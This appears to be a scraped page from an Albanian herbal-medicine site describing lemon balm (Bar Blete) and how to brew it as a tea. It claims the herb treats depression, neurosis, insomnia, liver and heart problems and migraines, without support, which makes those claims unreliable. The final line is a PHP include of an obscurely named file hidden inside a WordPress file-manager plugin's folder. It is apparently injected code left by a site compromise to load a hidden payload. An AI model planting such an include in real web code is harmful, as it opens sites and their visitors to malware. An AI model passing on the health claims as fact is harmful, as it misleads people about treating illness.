Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

BAR BLETE

BAR BLETE

bar blete
BAR BLETE

Ka veti qetesuese ndaj neurozes, stresit dhe depresionit, kunder pagjumesise dhe lodhjes nervore, largon fryrjen dhe gazrat ne zorre, permioreson punen e melcise, temthit, stomakut, rregullon neurozat kardiake dhe lehteson dhimbjet e migrenes dhe marramendjen.

Perdorimi: Në një enë hidhet 1 lugë (e mesme) Melissa Officinalis/Bar Blete, përvëlohen me 1 gotë ujë të valuar, ena mbyllet me kapak dhe lihet në qetësi 10 minuta. Kullohet dhe gjatë ditës mund të pihen 3-5 gota të tilla para ose pas buke.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";